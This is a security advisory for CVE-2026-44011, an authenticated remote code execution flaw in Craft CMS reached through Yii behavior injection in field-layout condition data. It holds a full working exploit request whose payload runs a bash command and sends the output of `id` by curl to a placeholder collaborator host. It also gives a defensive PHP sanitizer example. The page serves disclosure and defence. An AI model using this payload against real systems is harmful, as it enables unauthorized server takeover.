CVE-2026-44011

EPSS 0.02%

Craft CMS has Potential Authenticated Remote Code Execution via Malicious Attached Behavior

Published: 5/6/2026
Modified: 5/13/2026
Also known as: GHSA-qrgm-p9w5-rrfw

Description

We identified a vulnerability in the latest version of Craft CMS: an input-handling flaw in a Yii object-creation path that lets any authenticated user inject malicious configuration and execute arbitrary commands on the server. Yii's dynamic object configuration, as implemented in Craft CMS, lets the application build parts of itself from a settings array. This is largely a continuation of https://github.com/craftcms/cms/security/advisories/GHSA-255j-qw47-wjh5, reached through a different path that the original fix did not mitigate.

The request-controlled `condition.fieldLayouts` data is converted into a live `FieldLayout` object without a `Component::cleanseConfig()` boundary. Because Craft configures models before `parent::__construct()` runs, attacker-controlled special config keys take effect during object creation, and `FieldLayout` initialization then triggers an event within the same request. This appears to be another variant of the recent object-config / behavior-injection bug family, this time via the condition / field-layout hydration path.

We reproduced the issue by issuing a POST request to `/admin/actions/element-search/search` with the JSON below from any logged-in user. Other routes can be exploited in the same way, including the remaining element-indexes actions that pass through the same `beforeAction()` path. The request results in a curl request to the chosen server, with the output of the `id` command for the web user appended to the path:

```
POST /admin/actions/element-search/search HTTP/2
Host: hostnamehere
Cookie: CraftSessionId=...; 1234123412341234_identity=...; CRAFT_CSRF_TOKEN=...
Content-Length: …
User-Agent: Mozilla/5.0
X-Csrf-Token: ...
Accept: application/json
Content-Type: application/json

{
  "elementType": "craft\\elements\\Category",
  "siteId": 1,
  "search": "",
  "condition": {
    "class": "craft\\elements\\conditions\\ElementCondition",
    "elementType": "craft\\elements\\Category",
    "fieldLayouts": [
      {
        "as rce": {
          "__class": "yii\\behaviors\\AttributeTypecastBehavior",
          "__construct()": [
            {
              "attributeTypes": {
                "typecastBeforeSave": [
                  "Psy\\Readline\\Hoa\\ConsoleProcessus",
                  "execute"
                ]
              },
              "typecastBeforeSave": "/bin/bash -c \"curl https://yourcollaboratorservergoeshere/`id`\""
            }
          ]
        },
        "on *": "self::beforeSave"
      }
    ]
  }
}
```

## Resources

https://github.com/craftcms/cms/commit/ab85ca7f5f926994f723f60584054a1f4c4c5de3
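## Mitigation example

The missing boundary described above, as an added example that is not code from Craft CMS or Yii: a recursive sanitizer that strips the Yii special keys (`class`, `__class`, `__construct()`, `as <name>`, `on <event>`) from a request-supplied config subtree before it is hydrated into an object, and reports the dropped key paths so they can be logged as a detection signal. The function name, key list and sample body are assumptions; the server, not the request, should select the class to instantiate.

```php
<?php
// Added example, not Craft CMS or Yii code. It shows the kind of boundary the
// advisory says is missing: request-supplied config must be stripped of Yii
// "special" keys before it is handed to an object factory, because in the
// hydration path described above those keys take effect before
// parent::__construct() runs. The key list and function name are assumptions.
declare(strict_types=1);

/**
 * Recursively removes keys that select a class, invoke a constructor, attach a
 * behavior ("as <name>") or register an event handler ("on <event>").
 * Returns [$cleanConfig, $rejectedKeyPaths]; the paths are a detection signal
 * worth logging, since the legitimate UI never sends such keys.
 */
function cleanseUntrustedConfig(array $config, string $path = ''): array
{
    $clean = [];
    $rejected = [];
    foreach ($config as $key => $value) {
        $here = $path === '' ? (string) $key : "$path.$key";
        if (is_string($key) && (
            in_array($key, ['class', '__class', '__construct()'], true)
            || preg_match('/^(as|on)\s/', $key) === 1
        )) {
            $rejected[] = $here;
            continue; // drop the key and everything nested under it
        }
        if (is_array($value)) {
            [$value, $nested] = cleanseUntrustedConfig($value, $here);
            $rejected = array_merge($rejected, $nested);
        }
        $clean[$key] = $value;
    }
    return [$clean, $rejected];
}

// Constructed fieldLayouts subtree shaped like the request above, harmless values.
$body = <<<'JSON'
[{"name": "Default",
  "as injected": {"__class": "example\\SomeBehavior", "__construct()": [{}]},
  "on *": "self::beforeSave"}]
JSON;

[$clean, $rejected] = cleanseUntrustedConfig(json_decode($body, true, 512, JSON_THROW_ON_ERROR));
printf("rejected key paths: %s\n", implode(', ', $rejected));
echo json_encode($clean, JSON_PRETTY_PRINT | JSON_UNESCAPED_SLASHES), "\n";
```

Running it reports the `0.as injected` and `0.on *` paths as rejected and leaves only the plain `name` attribute, which is the shape a field-layout config should have by the time it reaches the factory.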

Affected packages (1)

CVSS scores

| Source | Version | Severity | Vector |
| --- | --- | --- | --- |
| osv | CVSS 4.0 | | CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N |

References (5)